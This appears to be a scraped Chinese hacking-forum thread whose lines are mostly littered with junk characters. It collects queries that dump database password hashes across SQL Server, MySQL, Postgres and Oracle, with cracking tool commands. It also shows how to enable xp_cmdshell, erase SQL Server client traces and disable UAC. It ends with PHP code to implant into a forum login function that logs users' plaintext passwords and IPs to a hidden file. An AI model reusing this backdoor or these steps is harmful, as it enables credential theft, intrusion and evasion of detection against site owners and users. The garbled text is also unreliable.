/ _# a7 T$ _0 _/ w1.sql server2000. V d3 X* p' @. _) m/ p# l. e" ^
SELECT password from master.dbo.sysxlogins where name='sa'
# `" A( Z' M6 q# T0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
: q, q( a% Y {2FD54D6119FFF04129A1D72E7C3194F7284A7F3A* L2 P) N+ T& f4 B; O# Q7 c
: A9 C/ Z0 c/ D3 B2 j0×0100- constant header, s& t+ G8 Z/ a& t
34767D5C- salt- B8 G3 a5 Z3 n* N
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash6 P0 k/ ] o9 K' Z' `
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
& \" p; G, B: Z2 k* G& i I& ]crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
- [% J8 ^; [; M: P; uSQL server 2005:-
& |4 C- N% G, u& |2 DSELECT password_hash FROM sys.sql_logins where name='sa'5 U/ z2 o! j) r" z' o
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F4 j. g+ b5 b* v) m: @2 X
0×0100- constant header
% q1 V9 ?* k' G6 {6 e7 e7 ~& E993BF231-salt! m& X1 }- L5 _1 g6 ?
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash6 V6 F: W& }5 @$ ^! F/ F! v6 i
crack case sensitive hash in cain, try brute force and dictionary based attacks." \; |6 Y9 e% s6 m
' G' x0 j+ @0 q( t6 u
update:- following bernardo’s comments:-" `8 y# w/ b4 a8 S
use function fn_varbintohexstr() to cast password in a hex string.
# d) Y/ |2 Z3 q' @4 @$ De.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
5 ~7 H+ B& T \& d, M( M% y) A: B0 D' I; Z0 b) Y
MYSQL:-
, u5 y6 Y4 [ p" Z
4 C$ m& c9 Q" y# k, HIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
2 c7 Y/ G' p) P. x& v) N3 X6 G8 @0 i4 w9 V% S
*mysql < 4.10 z+ P! n! Q8 g
6 q5 u8 o9 H' Z, F6 }4 }
mysql> SELECT PASSWORD(‘mypass’);
; `: L" e3 n( w) l$ R* p+——————–+
; [; Y. }; o! _6 C| PASSWORD(‘mypass’) |6 z4 q4 s1 A' @
+——————–+; l! q8 \, Z9 P# W( ^, S/ Y
| 6f8c114b58f2ce9e |+ @7 ~" _9 ~2 ?- W4 c# Y: ^' {3 l- r
+——————–+' v2 W8 x! t3 i2 r a3 ]" y
9 S0 M! s' z. N
*mysql >=4.14 P0 o% h5 N, R& j; E; Q
) ?# {4 u! I J0 ~% [; c$ Q# K& Smysql> SELECT PASSWORD(‘mypass’);. S+ {* ?: ?4 z- `
+——————————————-+6 J& S2 q& l6 D1 B) Q
| PASSWORD(‘mypass’) |
+ k$ B1 N% |% m# a! v7 l+——————————————-+ {1 w, [6 t: `% n& [7 N5 }: q" e3 ]
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |7 X2 z$ u$ r* x! D5 \6 T S
+——————————————-+/ J& J8 y/ V) {
1 H7 X$ b7 X, O! s
Select user, password from mysql.user, V8 j& O8 v0 P/ B" k. t9 T
The hashes can be cracked in ‘cain and abel’1 L: r) I7 G3 P, L2 i1 }; z. c1 B0 @
7 g# \) I/ f# _. h, b9 s$ zPostgres:-
# [# P! p& m; e9 R3 U9 K: d. PPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
2 j. z3 m3 \: G4 P6 b1 Eselect usename, passwd from pg_shadow;, D3 M- L2 y5 v8 V
usename | passwd- Y" Z5 @6 g8 c; A( B) q/ P4 o6 y
——————+————————————-
+ t; Z0 R2 H; S5 L0 b& o+ Rtestuser | md5fabb6d7172aadfda4753bf0507ed4396; O$ h& ?, }3 V1 B B, f
use mdcrack to crack these hashes:-
& s. b6 |0 i9 h- D Q1 k% h3 ^$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43968 U* d* _+ R8 h% k9 v/ b
) C6 v7 | D: E3 ROracle:-1 j' \/ o1 ]% Y; T% U
select name, password, spare4 from sys.user$
" o% C; r! ?# f& p4 Chashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
2 t4 O0 N# X: |1 X7 H4 z6 SMore on Oracle later, i am a bit bored…., Q9 ?6 W1 P( R- p+ Y" f- |
5 \* _) m9 k4 e. ]$ V
' i& C+ \! z! K6 X; r: J
在sql server2005/2008中开启xp_cmdshell: `9 _ u: U7 J8 o1 @
-- To allow advanced options to be changed.
' K5 [8 T# f; h3 }+ O: r0 @; yEXEC sp_configure 'show advanced options', 1
$ `# `; R5 e8 U: Z4 pGO0 g, A$ f% ?6 P& \( Z4 y* z. \
-- To update the currently configured value for advanced options.2 q. J2 e& j5 ~% s+ [% @7 Y
RECONFIGURE& i R: Q, ?0 r% ?3 i( X! h( \
GO0 a" C' o0 F7 B4 J9 {
-- To enable the feature.
. b. r0 l' x, h) X! [# AEXEC sp_configure 'xp_cmdshell', 1* E+ U4 s( Z3 y X- b8 S
GO/ M, ]8 U6 v F" F
-- To update the currently configured value for this feature.8 r1 a9 j* r( @! ]
RECONFIGURE& d: g7 `- a9 r4 R2 @$ h) a) ?
GO% c3 b4 s& f; X% W* A1 f! K
SQL 2008 server日志清除,在清楚前一定要备份。6 A3 ]* S* N3 C i2 }
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
. s4 j1 {3 `) s a, QX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin' N9 w# n& p/ v* O4 u
/ M% G& `7 W, Y) j) v* y$ M- s" k对于SQL Server 2008以前的版本:
5 m1 ]: w! o. U% TSQL Server 2005:. ^- b" y2 c2 |8 J6 ~/ M
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
* ]. z8 I8 B2 d& @' r. b3 pSQL Server 2000:
6 r: x; `& m8 w清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
6 \, n# d& _8 c' \
- `' }# D V4 Z9 ]6 H/ A本帖最后由 simeon 于 2013-1-3 09:51 编辑* n, ]$ r8 e0 v$ d
) R- x* E$ M# A8 z' g4 T
2 E) [2 R9 D2 x
windows 2008 文件权限修改
$ E; E, ]& b, m' x+ b& b) k/ b$ M; \1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
# t8 U4 L( i R U7 c E6 J4 h7 H2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
2 Q' Z9 L1 R7 C# h一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
7 e# G( @3 N0 q, _" p8 A, Z) \9 G/ l; ^& r3 C5 ?
Windows Registry Editor Version 5.00' M* B& y+ G- s5 i# z0 e
[HKEY_CLASSES_ROOT\*\shell\runas]
: l' i" x$ ?, v3 w7 G@="管理员取得所有权"4 t' @# Z0 c3 W1 A l2 W e* ~
"NoWorkingDirectory"=""( g7 l7 ^% ?5 R7 v( d4 t7 ~8 a
[HKEY_CLASSES_ROOT\*\shell\runas\command]
. ?3 J. | c* }@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"( Z( _; t' W! W! a6 U& V/ y& ]9 H
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F": \* a5 ~ B8 D, _* z5 p
[HKEY_CLASSES_ROOT\exefile\shell\runas2]( Q& c) r3 |* v7 A! Y9 `3 ^
@="管理员取得所有权"0 l4 H, E, X M
"NoWorkingDirectory"=""/ L' p3 U8 x/ Y- `+ A
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]/ w7 J0 r0 X1 [6 J8 E
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F", D. u1 e- \; ]8 {/ Y, A5 s
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"6 O9 V7 W" V7 [' J" B8 Z
: {4 v0 ^% N! ^9 T' M
[HKEY_CLASSES_ROOT\Directory\shell\runas]
5 a: s: V: h% i. r@="管理员取得所有权"
& @9 W( R$ o! J* i# b5 p, k" n: s- E T/ G"NoWorkingDirectory"=""
5 H/ v x7 s1 m$ f[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
6 ~3 p' i9 P( D4 X$ e4 E" [1 C@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"( s8 x! H; |: [( \4 s4 j
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"/ y; B2 q8 U0 V
. r$ ], O7 u+ T0 D5 l" C: H
' m7 [ e1 v9 f6 ?
win7右键“管理员取得所有权”.reg导入2 b. P1 j8 c' z# K
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,; Y0 A5 Q9 H6 {$ _' h
1、C:\Windows这个路径的“notepad.exe”不需要替换! ~. U: M: N; V2 E& O$ n
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
5 U1 T8 \. n6 {) W* p3、四个“notepad.exe.mui”不要管7 M' e- ?* U( |* s' k: k7 w
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和+ v1 j6 v! x. W5 U! o/ ?1 Y
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”( m2 N$ F( T$ D8 s" ~# |6 x
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,- r* b! M: _: I) h
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。' v$ t1 B o9 k r8 J
windows 2008中关闭安全策略:
( z" a! N& o% m' S! K6 jreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f7 F" E+ M# v: x
修改uc_client目录下的client.php 在
& k) [' F: b' b4 v' Zfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
9 @! D2 K ^4 Y' l& j下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
) n( h- |# }* e: g v! R你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
7 ]. z: @; B7 d. s3 O+ ^if(getenv('HTTP_CLIENT_IP')) {
4 d2 y2 |3 _ Z, _$onlineip = getenv('HTTP_CLIENT_IP');
; ^8 U$ u4 T5 J} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
1 w9 U$ }5 s2 Q, r$onlineip = getenv('HTTP_X_FORWARDED_FOR');9 _% H" M1 O, d3 [( y8 x8 R- B( V' l
} elseif(getenv('REMOTE_ADDR')) {
3 K9 r5 W$ P/ O G$onlineip = getenv('REMOTE_ADDR');% x$ ~5 W8 p; m5 m" Z6 H2 u! u
} else {
5 k5 y/ |( h! Q D$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
( Q. M1 M/ g" \& L. p. U3 {/ A}
+ _- K, I. N& t4 t+ D4 p. ? $showtime=date("Y-m-d H:i:s");7 \. j: y9 s0 i* L
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
: V) k0 q$ V* h, F $handle=fopen('./data/cache/csslog.php','a+');) g; K* a7 i+ l! F. V0 {
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对